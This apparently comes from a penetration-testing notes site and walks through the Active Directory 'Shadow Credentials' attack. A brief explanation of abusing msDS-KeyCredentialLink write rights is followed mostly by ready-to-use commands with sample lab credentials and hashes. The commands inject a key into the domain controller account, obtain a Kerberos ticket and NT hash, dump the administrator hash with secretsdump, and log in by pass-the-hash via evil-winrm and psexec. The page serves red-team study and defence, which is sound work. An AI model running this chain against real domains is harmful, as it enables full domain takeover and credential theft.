Shadow Credentials

The Shadow Credentials attack takes advantage of improper permissions on the msDS-KeyCredentialLink attribute, allowing attackers to inject their own public key into the attribute of a target user or computer account.

Permissions like GenericWrite or GenericAll are required to modify the msDS-KeyCredentialLink
the attacker adds their own public key to the msDS-KeyCredentialLink
The attacker creates a certificate in PFX format using the private key associated with the injected public key
With the generated certificate, the attacker authenticates to the domain using PKINIT

Shadow Credentials AttackHacking Articles

pywhisker & gettgtpkinit & getnthash

#Enumerate existing
pywhisker -d ignite.local -u "krishna" -p "Password@1" --target "DC$" --action "list"

#Generate and add new public-private key pair
pywhisker -d "ignite.local" -u "krishna" -p "Password@1" --target "DC$" --action "add" --filename DC$

Requesting TGT using cert

python gettgtpkinit.py -cert-pfx "/root/DC$.pfx" -pfx-pass eK2PeOlwG60EkPS2TNxX ignite.local/dc$ dc$.ccache

export KRB5CCNAME=/root/PKINITtools/dc$.ccache


python getnthash.py -key 86b989daa8099f4f9f04f14be14b33556f043c56b48b4d3c36ef030a65c9b3a0 ignite.local/dc$

certify-ad


certipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account dc$

Post-Exploitation

##Get hash
impacket-secretsdump -hashes :9df8e4935c53f1a8a007dad9a96232e3 'ignite/dc$@ignite.local' -just-dc-user administrator


#Login
evil-winrm -i 192.168.1.58 -u administrator -H 32196b56ffe6f45e294117b91a83bf38
impacket-psexec -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/administrator@192.168.1.58

PreviousPass The Ticket NextResourced Contrained Delegation

Last updated 4 months ago

hashtagpywhisker & gettgtpkinit & getnthash

hashtagcertify-ad

hashtagPost-Exploitation

pywhisker & gettgtpkinit & getnthash

certify-ad

Post-Exploitation